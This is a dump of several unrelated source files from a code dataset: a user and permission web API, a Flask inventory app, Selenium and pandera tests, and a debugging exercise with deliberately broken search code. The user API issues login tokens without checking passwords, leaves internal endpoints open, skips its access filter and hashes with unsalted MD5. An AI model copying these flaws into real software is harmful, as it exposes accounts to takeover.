'getparents':\n return self._get_parents(querys)\n\n elif option == 'updateparents':\n return self._update_parents(querys)\n\n elif option == 'isroot':\n return self._is_root(querys)\n\n elif option == 'isadmin':\n return self._is_admin(querys, system_id)\n\n elif option == 'listallows':\n return self._list_allows(querys, system_id)\n\n elif option == 'listdenys':\n return self._list_denys(querys, system_id)\n\n elif option == 'walk':\n return self._walk(querys)\n\n elif option == 'getchildren':\n return self._get_children(querys)\n\n elif option == 'search':\n return self._search(querys, system_id)\n\n elif option == 'get':\n return self._get(querys)\n\n elif option == 'add':\n return self._add(querys, system_id)\n\n elif option == 'update':\n return self._update(querys,system_id)\n\n elif option == 'enable':\n return self._enable(querys)\n\n elif option == 'disable':\n return self._disable(querys)\n\n elif option == 'remove':\n return self._remove(querys, system_id)\n\n elif option == 'listuser':\n return self._list_user(querys, system_id)\n\n elif option == 'listrole':\n return self._list_role(querys, 'role', system_id)\n\n elif option == 'listgroup':\n return self._list_role(querys, 'group', system_id)\n\n elif option == 'check':\n return self._check(querys, system_id)\n\n def get_children(self, key):\n pkeys = [x[0] for x in self.user_api.get_children(key) if key != x[0]]\n users = self.user_api.get_many(pkeys)\n\n results = []\n for user in users:\n results.append({\n 'id': user.id,\n 'name': user.name,\n 'alias': user.alias,\n 'type': user.type\n })\n return results\n\n def get_parents(self, key):\n pkeys = [x[0] for x in self.user_api.get_parents(key)]\n users = self.user_api.get_many(pkeys)\n\n results = []\n for user in users:\n results.append({\n 'id': user.id,\n 'name': user.name,\n 'alias': user.alias,\n 'type': user.type\n })\n return results\n\n def _get_parents(self, querys):\n results = []\n for query in querys:\n key = query['key']\n user = self.user_api.get(key)\n if user:\n results.append(self.get_parents(key))\n\n return results\n\n def _update_parents(self, querys):\n results = []\n\n with self.user_api.batch():\n for query in querys:\n key = query['key']\n self.user_api.update_parents(key, query['parents'])\n results.append(True)\n\n return results\n\n def _is_root(self, querys):\n results = []\n for query in querys:\n key = query['key']\n results.append(self.user_api.is_root(key))\n\n return results\n\n def _is_admin(self, querys, system_id):\n results = []\n for query in querys:\n key = query['key']\n results.append(self.user_api.is_admin(key, system_id))\n\n return results\n\n def _list_allows(self, querys, system_id):\n results = []\n for query in querys:\n key = query['key']\n results.append(self.user_api.list_allows(key))\n return results\n\n def _list_denys(self, querys, system_id):\n results = []\n for query in querys:\n key = query['key']\n results.append(self.user_api.list_denys(key))\n return results\n\n def _walk(self, querys):\n results = []\n for query in querys:\n key = query['key']\n for user, children, user_type in self.user_api.walk(key):\n results.append({\n 'id': user,\n 'type': user_type,\n 'children': children,\n })\n\n return results\n\n def _get_children(self, querys):\n results = []\n for query in querys:\n key = query['key']\n results.append(list(self.get_children(key)))\n\n return results\n\n def _search(self, querys, system_id):\n results = []\n user_types = ['all', self.user_api.user_type]\n role_types = ['all', 'role', 'group']\n\n for query in querys:\n user_type = query['type']\n condition = json2ObjectId(query['condition'])\n # 限制搜索,只能搜索这个站点下的用户或者角色\n condition['systems.$id'] = ObjectId(system_id)\n\n if user_type in user_types:\n with mdb.user.find(condition) as cursor:\n for item in cursor:\n results.append({\n 'id': str(item._id),\n 'name': item.name,\n 'alias': item.alias,\n 'type': self.user_api.user_type,\n 'children': self.get_children(str(item._id)),\n 'parents': self.get_parents(str(item._id)),\n })\n\n if user_type in role_types:\n\n if user_type != 'all':\n condition['type'] = user_type\n\n with mdb.role.find(condition) as cursor:\n for item in cursor:\n results.append({\n 'id': str(item._id),\n 'name': item.name,\n 'alias': item.alias,\n 'type': item.type,\n 'children': self.get_children(str(item._id)),\n 'parents': self.get_parents(str(item._id)),\n })\n\n return results\n\n def _disable(self, querys):\n results = []\n for query in querys:\n key = query['key']\n self.user_api.disable(key)\n results.append(True)\n\n return results\n\n def _enable(self, querys):\n results = []\n for query in querys:\n key = query['key']\n self.user_api.enable(key)\n results.append(True)\n\n return results\n\n def _get(self, querys):\n results = []\n for query in querys:\n key = query['key']\n node = self.user_api.get(key)\n\n if not node:\n continue\n\n result = {\n 'id': key,\n 'name': node.name,\n 'alias': node.alias,\n 'type': node.type,\n 'children': self.get_children(key),\n 'parents': self.get_parents(key),\n }\n\n if 'disable' in node:\n result['disable'] = node.disable\n\n if 'created' in node:\n result['created'] = node.created\n\n results.append(result)\n\n return results\n\n def _add(self, querys, system_id):\n results = []\n sub_db = sys_db( system_id = system_id)\n with self.user_api.batch():\n for query in querys:\n fields = query\n\n kw = fields.copy()\n user_type = kw.pop('type')\n parents = kw.pop('parents', False)\n kw['system'] = system_id\n\n user_id = self.user_api.add(user_type, **kw)\n\n if user_id is None:\n results.append(make_msg(403, '不能重复创建用户'))\n\n else:\n kw[\"_id\"] = ObjectId(user_id)\n\n # TODO 没有登录用户\n #sub_db['__user__'].save(kw)\n\n if parents:\n self.user_api.update_parents(user_id, parents)\n\n fields.pop('password', None)\n fields['id'] = user_id\n results.append(fields)\n\n return results\n\n def _update(self, querys, system_id):\n results = []\n sub_db = sys_db(system_id = system_id)\n with self.user_api.batch():\n for query in querys:\n fields = query\n key = query.pop('key')\n\n fields.pop('type', None)\n parents = fields.pop('parents', [])\n\n if fields:\n self.user_api.update(key, **fields)\n # TODO 没有登录用户\n #sub_db['__user__'].update(key,fields)\n\n if parents:\n self.user_api.update_parents(key, parents)\n\n results.append(True)\n\n return results\n\n def _remove(self, querys, system_id):\n results = []\n\n with self.user_api.batch():\n for query in querys:\n key = query['key']\n self.user_api.remove(key, system_id)\n results.append(True)\n\n return results\n\n def _list_user(self, querys, system_id):\n results = []\n\n for query in querys:\n\n condition = query.get('condition', {})\n condition.pop('systems', None)\n condition.pop('type', None)\n condition = json2ObjectId(condition)\n condition['systems.$id'] = ObjectId(system_id)\n\n paging = Paging()\n paging.size = int(query.get('size', 20))\n paging.index = int(query.get('page', 1))\n\n # parent 条件:只要这些角色/组的用户\n if query.get('parents'):\n _cond = []\n\n for parent in query['parents']:\n for user_id, user_type in self.user_api.get_children(parent):\n if user_type != self.user_api.user_type:\n continue\n _cond.append({'_id': ObjectId(user_id)})\n\n if not _cond:\n paging.count = 0\n result = paging.as_dict()\n result['results'] = {}\n results.append(result)\n continue\n\n condition.setdefault('$or', []).extend(_cond)\n\n with mdb.user.find(condition) as cursor:\n paging.count = cursor.count()\n result = paging.as_dict()\n result['results'] = []\n\n for user in cursor.skip(skip(paging)).limit(paging.size):\n user_id = str(user._id)\n try:\n children = self.get_children(user_id)\n except:\n continue\n user_id = str(user._id)\n result['results'].append({\n 'id': user_id,\n 'name': user.name,\n 'alias': user.alias,\n 'disable': user.get('disable', False),\n 'created': user.get('created', user._id.generation_time),\n 'type': 'user',\n 'children': children,\n 'parents': self.get_parents(user_id),\n })\n\n results.append(result)\n\n return results\n\n def _list_role(self, querys, type, system_id):\n results = []\n\n for query in querys:\n\n condition = query.get('condition', {})\n condition.pop('systems', None)\n condition.pop('type', None)\n condition = json2ObjectId(condition)\n condition['systems.$id'] = ObjectId(system_id)\n condition['type'] = type\n\n paging = Paging()\n paging.size = int(query.get('size', 20))\n paging.index = int(query.get('page', 1))\n\n # parent 条件:只要这些角色/组的用户\n if query.get('parents'):\n _cond = []\n\n for parent in query['parents']:\n for user_id, user_type in self.user_api.get_children(parent):\n if user_type != self.user_api.role_type:\n continue\n _cond.append({'_id': ObjectId(user_id)})\n\n if not _cond:\n paging.count = 0\n result = paging.as_dict()\n result['results'] = {}\n results.append(result)\n continue\n\n condition.setdefault('$or', []).extend(_cond)\n\n with mdb.role.find(condition) as cursor:\n paging.count = cursor.count()\n result = paging.as_dict()\n result['results'] = []\n\n for user in cursor.skip(skip(paging)).limit(paging.size):\n user_id = str(user._id)\n result['results'].append(self.user_api.get(user_id))\n\n results.append(result)\n\n return results\n\n def _check(self, querys, system_id):\n \"\"\"\n 用户在全部站点只允许唯一的name字段,角色/用户组值允许每一个站点拥有唯一name字段\n \"\"\"\n results = []\n\n for query in querys:\n fields = query\n user_type = fields['type']\n\n if user_type == self.user_api.user_type:\n results.append(mdb.user.find_one({'name': fields['name']}, {'_id': 1}) is not None)\n\n else:\n result = mdb.role.find_one({'name': fields['name'], 'systems.$id': ObjectId(system_id)}, {'_id': 1})\n results.append(result is not None)\n\n return results\n\nuser = User()\npermission = Permission()\nspermission = SPermission()\n\n@url(\"/api/user/permission/(.*)\")\nclass Permission1(HandlerBase):\n\n def get(self, option):\n results = permission.get(self, option)\n return self.json(results)\n\n def post(self, option):\n results = permission.get(self, option)\n return self.json(results)\n\n@url(\"/api/user/spermission/(.*)\")\nclass SPermission1(HandlerBase):\n\n def get(self, option):\n results = spermission.get(self, option)\n return self.json(results)\n\n def post(self, option):\n results = spermission.get(self, option)\n return self.json(results)\n\n@url(\"/api/user/batch\", order=1)\nclass Batch(HandlerBase):\n\n def get(self):\n return self.post()\n\n def post(self):\n querys = json.loads(self.get_argument('querys'))\n results = []\n\n for query in querys:\n\n # 兼容 user, permission, spermission 需要的格式\n fields = query.get('fields')\n if not fields:\n fields = [{}]\n else:\n fields = [fields]\n\n try:\n scope = query['scope']\n action = query['action']\n\n if scope == 'user':\n data = user.get(self, action, fields)\n elif scope == 'permission':\n data = permission.get(self, action, fields)\n else:\n data = spermission.get(self, action, fields)\n\n # user,permission, spermission对象本身支持批量处理\n # batch每一个query默认是单个请求,所以取返回结果第一个\n data = data[0] if data and len(data) > 0 else {}\n if isinstance(data, Result):\n result = data\n else:\n result = {'data': data, 'status': True, 'statusCode': 200, 'message': '成功'}\n\n except KeyError:\n traceback.print_exc()\n result = {'data': {}, 'status': False, 'statusCode': 400, 'message': '无法获得参数'}\n\n except:\n traceback.print_exc()\n result = {'data': {}, 'status': False, 'statusCode': 500, 'message': '服务内部错误'}\n\n results.append(result)\n\n return self.json(results)\n\n# 这个类专门用于注册,不需要验证权限\n@url(\"/api/user/add\", order=1)\nclass RegisterUser(OpenRequestHandler):\n\n def get(self):\n results = user.get(self, 'add')\n return self.json(results)\n\n def post(self):\n results = user.get(self, 'add')\n return self.json(results)\n\n@url(\"/api/user/check\", order=1)\nclass CheckUser(OpenRequestHandler):\n\n def get(self):\n results = user.get(self, 'check')\n return self.json(results)\n\n def post(self):\n results = user.get(self, 'check')\n return self.json(results)\n\n@url(\"/api/user/(((?!/).)*$)\")\nclass User1(HandlerBase):\n\n def get(self, option, _):\n results = user.get(self, option)\n return self.json(results)\n\n def post(self, option, _):\n results = user.get(self, option)\n return self.json(results)\n\n@url(\"/api/user/token\", order=1)\nclass UserToken(OpenRequestHandler):\n \"\"\"\n 开放用户用API方式登陆系统\n 这个APi返回一个token,包含了:\n 1,哪个用户\n 2,这个token过期时间, 默认是一个小时\n \"\"\"\n\n def get(self):\n return self.post()\n\n def post(self):\n name = self.get_argument('username', '')\n password = self.get_argument('password', '')\n expires = self.get_argument('expires', '3600')\n\n if not name:\n return self.json({\n 'status': False,\n 'statusCode': 400,\n 'message': '参数错误',\n 'data': {}\n })\n\n try:\n expires = int(expires)\n except:\n return self.json({\n 'status': False,\n 'statusCode': 400,\n 'message': '参数错误',\n 'data': {}\n })\n\n if password:\n password = hashlib.md5(password).hexdigest()\n\n #user = mdb.user.find_one({'name': name, 'password': password}, {'name': 1, 'alias': 1, 'email': 1})\n user = mdb.user.find_one({'name': name}, {'name': 1, 'alias': 1, 'email': 1})\n\n if not user:\n return self.json({\n 'status': False,\n 'statusCode': 404,\n 'message': '没有找到这个用户',\n 'data': {}\n })\n\n user_id = user.pop('_id')\n user['id'] = str(user_id)\n\n token = UserSign.dumps({'id': user['id']}, expires)\n\n return self.json({\n 'status': True,\n 'statusCode': 200,\n 'message': '成功',\n 'data': {'token': token, 'user': user}\n })\n\n@url(\"/api/user/token2\", order=1)\nclass UserToken2(OpenRequestHandler):\n \"\"\"\n 开放用户用API方式登陆系统\n 这个APi返回一个token,包含了:\n 1,哪个用户\n 2,这个token过期时间, 默认是一个小时\n \"\"\"\n\n def get(self):\n return self.post()\n\n def post(self):\n name = self.get_argument('username', '')\n key = self.get_argument('key', '')\n timestamp = self.get_argument('timestamp', '')\n sign = self.get_argument('sign', '')\n expires = self.get_argument('expires', '3600')\n\n if not name or not key or not timestamp or not sign:\n return self.json(make_msg(400, '参数错误'))\n\n try:\n expires = int(expires)\n sign = str(sign)\n name = str(name)\n key = str(key)\n _timestamp = int(timestamp)\n except:\n return self.json(make_msg(400, '参数错误'))\n\n # 签名的时间不能超过5分钟\n current_time = int(time.time())\n if current_time - _timestamp > 300:\n return self.json(make_msg(408, '签名已超时', data={'timestamp': current_time}))\n\n user = mdb.user.find_one({'name': name}, {'password': 1, 'disable': 1})\n\n if not user:\n return self.json(make_msg(404, '没有找到这个用户'))\n\n if user.get('disable'):\n return self.json(make_msg(403, '用户没有权限登陆'))\n\n # 验证签名\n md5 = hashlib.md5()\n md5.update(key)\n md5.update(settings.OPEN_KEY)\n md5.update(str(timestamp))\n md5.update(name)\n md5.update(user.get('password'))\n\n if md5.hexdigest() != sign:\n return self.json(make_msg(500, '验证签名失败'))\n\n token = UserSign.dumps({'id': str(user['_id']), 'key': key}, expires)\n\n return self.json(make_msg(200, data=token))\n\n# 以下三个类,是内部api,安全性比较低,不对外开发\n@url(\"/_inside/api/user/permission/(.*)\")\nclass Permission2(OpenHandlerBase):\n\n def get(self, option):\n cuser = self.get_argument('cuser', {})\n if cuser:\n self.current_user = json.loads(cuser)\n sid = self.session.generate_sid()\n self.set_secure_cookie(sid, pickle.dumps(self.current_user))\n return self.json(permission.get(self, option))\n\n@url(\"/_inside/api/user/spermission/(.*)\")\nclass SPermission2(OpenHandlerBase):\n\n def get(self, option):\n cuser = self.get_argument('cuser', {})\n if cuser:\n self.current_user = json.loads(cuser)\n sid = self.session.generate_sid()\n self.set_secure_cookie(sid, pickle.dumps(self.current_user))\n return self.json(spermission.get(self, option))\n\n@url(\"/_inside/api/user/(((?!/).)*$)\")\nclass User2(OpenHandlerBase):\n\n def get(self, option, _):\n cuser = self.get_argument('cuser', {})\n if cuser:\n self.current_user = json.loads(cuser)\n sid = self.session.generate_sid()\n self.set_secure_cookie(sid, pickle.dumps(self.current_user))\n return self.json(user.get(self, option))\n\ndef filter_from_system(user_api, querys, system_id):\n \"\"\" 过滤querys,将不属于这个站点(system_id)的请求过滤\n\n 1, 没有system_id, 意味着不需要过滤\n 1, 没有指定key,就不管了, 一般这种不是无关紧要,就是已经在执行时候由这个动作自己过滤 .e.g. list_user, list_role, list_gorup, search 方法\n \"\"\"\n return querys\n\n if not system_id:\n return querys\n\n results = []\n\n for query in querys:\n key = query.get('key')\n if not key or user_api.review(key, system_id) or key == '547edcaafb6c9be44b48a616':\n results.append(query)\n\n return results\n\n@url(\"/api/user/login/confirm\")\nclass ApiLogin(OpenHandlerBase):\n\n def get(self):\n return self.post()\n\n def post(self):\n \"\"\" 验证用户名和密码\n\n 密码应该是加密之后的值\n \"\"\"\n\n username = self.get_argument('username')\n password = self.get_argument('password')\n\n if not username or not password:\n return self.json({'status': 2, 'message': u'用户名或者密码不能为空'})\n\n result = mdb.user.find({'name': username, 'password': password})\n\n if result.count() == 0:\n return self.json({'status': 1, 'message': u'用户名或者密码错误'})\n\n else:\n return self.json({'status': 0})\n","sub_path":"handlers/user/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":31607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"58696309","text":"from datetime import datetime\nfrom decimal import Decimal\nfrom flask import Blueprint, render_template, redirect, url_for, request, flash, session\nfrom flask_login import current_user, login_required\nfrom sqlalchemy import func\nfrom inventoryapp import db\nfrom inventoryapp.models import Inventory\nfrom inventoryapp.inventory.forms import InventoryForm, UpdateInventoryItemForm\nfrom inventoryapp.inventory.utils import calc_time_delta, remove_exponent\n\ninven = Blueprint('inventory', __name__) # pass in the name of our blueprint too: \"inventory\". set it to \"inven\" here so no collisions\n\n\n@inven.route('/inventory')\n@login_required\ndef inventory():\n all_inventory = Inventory.query.order_by(Inventory.last_updated.desc()).all() # the desc() puts the most recently updated items first\n \n return render_template('inventory.html', inventory = all_inventory, calc_time_delta = calc_time_delta, remove_exponent = remove_exponent)\n\n\n@inven.route('/inventory/') # view a singular item\n@login_required\ndef item(id):\n item = Inventory.query.get_or_404(id)\n return render_template('item.html', title = item.name, item = item)\n\n\n@inven.route('/inventory/new', methods=['GET', 'POST'])\n@login_required\ndef new_item():\n form = InventoryForm()\n if form.validate_on_submit():\n item = Inventory(name = form.name.data, size = form.size.data, count = form.count.data, description = form.description.data)\n\n db.session.add(item)\n db.session.commit()\n flash(\"New item added\", 'success')\n return redirect(url_for('inventory.inventory')) # inventory route in inventory package?\n return render_template('new_item.html', form = form)\n\n\n@inven.route('/inventory//update', methods=['GET', 'POST'])\n@login_required\ndef update_item(id):\n form = UpdateInventoryItemForm()\n item = Inventory.query.get_or_404(id)\n if form.validate_on_submit(): # user submitted valid updated post\n item.count = form.count.data\n item.last_updated = datetime.utcnow() # update the last updated time for this item to \"now\"\n db.session.commit()\n flash('Your item has been updated!', 'success')\n return redirect(url_for('inventory.inventory', id = item.id)) # should redirect to url_for('inventory.item') but not implemented yet, so just go back to inventory\n elif request.method == 'GET': # user just visited the edit page of their item so we populate the field with the current item's data\n form.name.data = item.name\n form.size.data = item.size\n form.count.data = item.count # can't remove exponent here because the Form is set to a DecimalField anyways\n form.description.data = item.description\n return render_template('update.html', title = 'Update item count', form = form, remove_exponent = remove_exponent, id = id)\n\n\n@inven.route('/inventory//delete', methods=['POST'])\n@login_required\ndef delete_item(id):\n item = Inventory.query.get_or_404(id)\n db.session.delete(item)\n db.session.commit()\n flash(\"Item deleted successfully\", 'success')\n return redirect(url_for('inventory.inventory'))\n\n\n\"\"\"\nIncomplete functionality\n\"\"\"\n@inven.route('/inventory/stocktake', methods=['GET', 'POST'])\n@login_required\ndef stocktake():\n all_inventory = Inventory.query.order_by(Inventory.last_updated.desc()).all()\n form = UpdateInventoryItemForm()\n return render_template('stocktake.html', inventory = all_inventory, calc_time_delta = calc_time_delta, remove_exponent = remove_exponent)\n\n\n@inven.route('/inventory/purchasing', methods=['GET', 'POST'])\n@login_required\ndef purchasing():\n # get will give them a checklist for which items, post returns a shopping list\n all_inventory = Inventory.query.order_by(Inventory.last_updated.desc()).all()\n count = len(all_inventory)\n \n\n if request.method == 'POST':\n list_checked = []\n i = 1\n while i < count + 1:\n x = request.form.get(str(i), \"off\")\n if x == 'on':\n list_checked.append(i)\n i = i + 1\n if len(list_checked) != 0: # not an empty list. the user did select at least one checkbox\n return render_template('purchasing_list.html', inventory = all_inventory, list_checked = list_checked, remove_exponent = remove_exponent)\n \n return redirect(url_for('inventory.inventory'))\n\n return render_template('purchasing.html', inventory = all_inventory, count = count)\n\n","sub_path":"inventoryapp/inventory/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"378702715","text":"from selenium import webdriver\nimport time \nimport math\nimport pyperclip\n\nlink = \"http://suninjuly.github.io/alert_accept.html\"\n\ndef calc(x):\n return str(math.log(abs(12*math.sin(int(x)))))\n\ntry:\n browser = webdriver.Chrome()\n browser.get(link)\n\n browser.find_element_by_css_selector('button.btn').click()\n browser.switch_to.alert.accept()\n browser.find_element_by_id('answer').send_keys(calc(browser.find_element_by_id('input_value').text))\n browser.find_element_by_css_selector('button.btn').click()\n time.sleep(3)\n \n alert = browser.switch_to.alert\n alert_text = alert.text\n addToClipBoard = alert_text.split(': ')[-1]\n pyperclip.copy(addToClipBoard)\n time.sleep(1)\n\nfinally:\n # закрываем браузер после всех манипуляций\n browser.quit()\n\n# не забываем оставить пустую строку в конце файла\n","sub_path":"Tests lesson 2/stepik_selenium_2.3.4.py","file_name":"stepik_selenium_2.3.4.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"135141093","text":"from decimal import Decimal\nimport datetime as dt\n\nclass TransactionError(Exception):\n pass\n\nclass Transaction:\n MAX_NOTE_LEN = 50\n def __init__(self, debits: dict, credits: dict, note):\n amts_to_dec = lambda entry: {account: Decimal(entry[account]) for account in entry} \n if len(note) > self.MAX_NOTE_LEN:\n raise TransactionError(f\"length of note is greater than {self.MAX_NOTE_LEN}\")\n elif not isinstance(note, str):\n raise TransactionError(f\"attempted to set non-str value to note\")\n \n self._note = note\n self._debits = amts_to_dec(debits)\n self._credits = amts_to_dec(credits)\n\n debits_sum = sum(self._debits.values())\n credits_sum = sum(self._credits.values())\n if debits_sum != credits_sum:\n raise TransactionError(f\"debit of {debits_sum} doesn't match credit of {credits_sum}\")\n self._total = debits_sum\n\n @property\n def note(self):\n return self._note\n\n @note.setter\n def note(self, new_note):\n if len(new_note) > self.MAX_NOTE_LEN:\n raise ValueError(f\"length of note is greater than {self.MAX_NOTE_LEN}\")\n elif not isinstance(new_note, str):\n raise TypeError(f\"attempted to set non-str value to note\")\n self._note = new_note\n\n @property\n def total(self) -> int:\n return self._total\n\n def debit_accounts(self):\n return self._debits.keys()\n\n def credit_accounts(self):\n return self._credits.keys()\n\n def debit_value(self, account) -> Decimal:\n if account not in self._debits:\n raise KeyError(f\"{account} not a debited account in this transaction\")\n return self._debits[account]\n\n def credit_value(self, account) -> Decimal:\n if account not in self._credits:\n raise KeyError(f\"{account} not a credited account in this transaction\")\n return self._credits[account]\n\nclass Journal():\n def __init__(self):\n self._entries = dict()\n self._total = Decimal(0)\n\n def __getitem__(self, val):\n \"retrieve a transaction at a date or within a range of dates if val is a slice\"\n if isinstance(val, slice):\n new_journal = Journal()\n date_from = val.start if val.start else dt.date.min\n date_to = val.stop if val.stop else dt.date.max\n new_journal._entries = {date: trans for date, trans in self._entries.items() \n if date < date_to and date >= date_from}\n new_journal._total = sum(tran.total for tran in new_journal._entries.values())\n return new_journal\n else:\n return self._entries[val]\n\n def __setitem__(self, date, transaction: Transaction):\n if date not in self._entries:\n self._entries[date] = []\n self._entries[date].append(transaction)\n self._total += transaction.total\n\n def __iter__(self):\n return iter(self._entries)\n\n def __len__(self):\n return len(self._entries)\n","sub_path":"buddy/journal.py","file_name":"journal.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"27246935","text":"import elasticsearch\nimport json, argparse, scdv\n\nclass elasticsearchClient():\n def __init__(self, host, port, index):\n self.host = host\n self.port = port\n self.index = index\n self.client = elasticsearch.Elasticsearch(self.host + \":\" + self.port)\n\n # 文章をトークナイズする。\n def tokenize(self, sentence):\n body_ = {\"analyzer\": \"sudachi_analyzer\", \"text\": sentence}\n json_tokens = self.client.indices.analyze(\n index = self.index, body=body_)\n\n tokens = [token['token'] for token in json_tokens['tokens']]\n return tokens\n\n def parse_data(self, items):\n results = []\n\n for item in items:\n index = json.dumps(item['_id'])\n category = json.dumps(\n item['_source']['業種(大分類)'], \n indent=2, ensure_ascii=False)\n sentence = json.dumps(\n item['_source']['文章'], \n indent=2, ensure_ascii=False)\n\n tokens = self.tokenize(sentence)\n results.append((index, category, sentence, tokens))\n return results\n\n # 全データを取得する\n def get_all_data(self, scroll_time, scroll_size):\n results = []\n\n data = self.client.search(\n index = self.index,\n scroll = scroll_time,\n size = scroll_size,\n body = {})\n sid = data['_scroll_id']\n scroll_size = len(data['hits']['hits'])\n\n results = self.parse_data(data['hits']['hits'])\n\n while scroll_size > 0:\n data = self.client.scroll(\n scroll_id = sid, \n scroll = scroll_time)\n\n sid = data['_scroll_id']\n scroll_size = len(data['hits']['hits'])\n scroll_results = self.parse_data(data['hits']['hits'])\n results.extend(scroll_results)\n\n return results\n def update(self, row_id, body):\n response = self.client.update(\n index = self.index, \n id = row_id, \n body = body)\n print(response)\n\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--host', type=str)\n parser.add_argument('--port', type=str, default='9200')\n parser.add_argument('--index', type=str)\n parser.add_argument('--output', type=str)\n parser.add_argument('--scroll_limit', type=str, default='1m')\n parser.add_argument('--scroll_size', type=int, default=100)\n\n return parser.parse_args()\n\ndef main(args):\n client = elasticsearchClient(args.host, args.port, args.index)\n results = client.get_all_data(args.scroll_limit, args.scroll_size)\n\n output_txt = args.output.replace(\".csv\", \".txt\")\n with open(args.output, \"w\") as f_csv:\n with open(output_txt, \"w\") as f_txt:\n f_csv.writelines('ID,業種(大分類),文章,分かち書き\\n')\n\n for result in results:\n tokens = \" \".join(result[3])\n f_csv.writelines(result[0] + ',' + result[1] + ',' + result[2] + ',\"' + tokens + '\"\\n')\n f_txt.writelines(tokens + '\\n')\n scdv_vec = scdv.build_model(args.output, 20, \"gmm_cluster.pkl\", \"gmm_prob_cluster.pkl\")\n\n for row_id, vector in scdv_vec:\n client.update(row_id, {'doc':{'scdv_vector':vector.tolist()}})\n\n\nif __name__ == '__main__':\n main(parse_args())\n","sub_path":"es_client.py","file_name":"es_client.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"310618772","text":"#\n# binary search\n# O(log n) time algorithm for finding a target in a sorted array.\n#\n# Returns an index in 1..n if found, None if not\n#\n\ndef binarySearch(a, target):\n n = len(a)\n lo = 0\n up = n - 1\n\n while True:\n mid = (lo + hi) // 2\n if target < a[mid]:\n up = mid - 1\n else:\n lo = mid + 1\n if lo > up or target == a[mid]:\n break\n return lo <= up and mid\n\n\n# bisect\n# Find the largest t such that f(t) < 0\n#\ndef bisect(f):\n hi = math.inf\n lo = 0\n while hi != lo:\n mid = (lo + hi)/2;\n if f(mid) > 0:\n hi = mid;\n else:\n lo = mid;\n return hi\n","sub_path":"Activities/debugging/debug1.py","file_name":"debug1.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"97793220","text":"\"\"\"Tests schema creation and validation from type annotations.\"\"\"\n# pylint:disable=missing-class-docstring,missing-function-docstring,too-few-public-methods\nimport re\nfrom typing import Iterable, Optional\n\nimport pandas as pd\nimport pytest\n\nimport pandera as pa\nfrom pandera.typing import Index, Series\n\n\ndef test_to_schema():\n \"\"\"Test that SchemaModel.to_schema() can produce the correct schema.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Series[int]\n b: Series[str]\n idx: Index[str]\n\n expected = pa.DataFrameSchema(\n columns={\"a\": pa.Column(int), \"b\": pa.Column(str)},\n index=pa.Index(str),\n )\n\n assert expected == Schema.to_schema()\n\n with pytest.raises(TypeError):\n Schema()\n\n\ndef test_invalid_annotations():\n \"\"\"Test that SchemaModel.to_schema() fails if annotations or types are not\n recognized.\n \"\"\"\n\n class Missing(pa.SchemaModel):\n a = pa.Field()\n b: Series[int]\n c = pa.Field()\n _d = 0\n\n err_msg = re.escape(\"Found missing annotations: ['a', 'c']\")\n with pytest.raises(pa.errors.SchemaInitError, match=err_msg):\n Missing.to_schema()\n\n class Invalid(pa.SchemaModel):\n a: int\n\n with pytest.raises(pa.errors.SchemaInitError, match=\"Invalid annotation\"):\n Invalid.to_schema()\n\n from decimal import Decimal # pylint:disable=C0415\n\n class InvalidDtype(pa.SchemaModel):\n d: Series[Decimal] # type: ignore\n\n with pytest.raises(\n TypeError, match=\"python type '\"\n ):\n InvalidDtype.to_schema()\n\n\ndef test_optional_column():\n \"\"\"Test that optional columns are not required.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Optional[Series[str]]\n b: Optional[Series[str]] = pa.Field(eq=\"b\")\n\n schema = Schema.to_schema()\n assert not schema.columns[\"a\"].required\n assert not schema.columns[\"b\"].required\n\n\ndef test_optional_index():\n \"\"\"Test that optional indices are not required.\"\"\"\n\n class Schema(pa.SchemaModel):\n idx: Optional[Index[str]]\n\n with pytest.raises(\n pa.errors.SchemaInitError, match=\"Index 'idx' cannot be Optional.\"\n ):\n Schema.to_schema()\n\n\ndef test_schemamodel_with_fields():\n \"\"\"Test that Fields are translated in the schema.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Series[int] = pa.Field(eq=9, ne=0)\n b: Series[str]\n idx: Index[str] = pa.Field(str_length={\"min_value\": 1})\n\n actual = Schema.to_schema()\n expected = pa.DataFrameSchema(\n columns={\n \"a\": pa.Column(\n int, checks=[pa.Check.equal_to(9), pa.Check.not_equal_to(0)]\n ),\n \"b\": pa.Column(str),\n },\n index=pa.Index(str, pa.Check.str_length(1)),\n )\n\n assert actual == expected\n\n\ndef test_invalid_field():\n class Schema(pa.SchemaModel):\n a: Series[int] = 0\n\n with pytest.raises(\n pa.errors.SchemaInitError, match=\"'a' can only be assigned a 'Field'\"\n ):\n Schema.to_schema()\n\n\ndef test_multiindex():\n \"\"\"Test that multiple Index annotations create a MultiIndex.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Index[int] = pa.Field(gt=0)\n b: Index[str]\n\n expected = pa.DataFrameSchema(\n index=pa.MultiIndex(\n [\n pa.Index(int, name=\"a\", checks=pa.Check.gt(0)),\n pa.Index(str, name=\"b\"),\n ]\n )\n )\n assert expected == Schema.to_schema()\n\n\ndef test_check_validate_method():\n \"\"\"Test validate method on valid data.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Series[int]\n\n @pa.check(\"a\")\n def int_column_lt_100(cls, series: pd.Series) -> Iterable[bool]:\n # pylint:disable=no-self-argument\n assert cls is Schema\n return series < 100\n\n df = pd.DataFrame({\"a\": [99]})\n assert isinstance(Schema.validate(df, lazy=True), pd.DataFrame)\n\n\ndef test_check_single_column():\n \"\"\"Test the behaviour of a check on a single column.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Series[int]\n\n 